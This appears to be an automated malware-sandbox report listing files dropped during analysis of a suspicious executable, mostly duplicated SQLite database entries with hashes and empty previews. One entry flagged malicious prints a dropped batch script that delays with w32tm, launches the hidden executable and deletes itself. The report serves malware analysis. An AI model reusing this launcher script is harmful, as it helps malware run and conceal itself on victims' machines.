                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):214
                                                    Entropy (8bit):5.311623002360796
                                                    Encrypted:false
                                                    SSDEEP:6:hCijTg3Nou1SV+DE7tUfPNbKOZG1wkn23fxAKDoRH:HTg9uYDE7SfhfZAKDMH
                                                    MD5:40A416783A088FD5936DAD8A3B2A3166
                                                    SHA1:50023ECDB77EEAC34997227193DEDA4E6BDAD1D7
                                                    SHA-256:EF9491BFCF63CF34F6AB84FE5FBC95DD89427342D2655DE15CE8DA6645B14F05
                                                    SHA-512:9B3CD8E9FC5A5C1031A8B87D3E8FFBE76282FB19AB79593F9F9F9BA58274E9957511258AD2942195783FEC07A7846E2F70703A3524551A0587AFD0CECF72EF1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\OQZC6ToBZn.bat"
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
